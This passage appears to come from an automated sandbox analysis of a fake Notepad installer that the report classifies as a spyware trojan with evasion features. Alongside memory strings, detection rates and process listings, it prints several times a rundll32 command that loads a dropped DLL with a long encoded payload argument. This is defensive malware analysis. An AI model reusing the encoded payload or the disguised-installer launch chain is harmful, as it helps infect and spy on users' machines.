              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLEAUT32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempr.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLE32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.00000000028CB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.000000000072C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameimm32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000D37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000027BF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecurity.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000D2B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemswsock.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245563996.0000000002688000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000003062000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000713000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePSAPIj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000D3A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002940000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePROFAPI.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000746000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245469036.00000000025BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000D10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.000000000334F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000715000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilterLib.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebcryptprimitives.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.000000000071D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel.appcore.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002902000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLE32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.000000000072B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: nsis_uns6283e8.dll.0.drStatic PE information: Number of sections : 11 > 10
              Source: Notteppad_SettupX32iX64.exeStatic PE information: Section: .data ZLIB complexity 0.9993990384615384
              Source: Notteppad_SettupX32iX64.exeReversingLabs: Detection: 19%
              Source: Notteppad_SettupX32iX64.exeVirustotal: Detection: 21%
              Source: Notteppad_SettupX32iX64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE=
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5152 -s 272
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE=Jump to behavior
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeFile created: C:\Users\user\AppData\Roaming\nsis_uns6283e8.dllJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@0/1
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9201 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,Process32NextW,StrCmpIW,CloseHandle,CloseHandle,0_2_006E9201
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE=
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029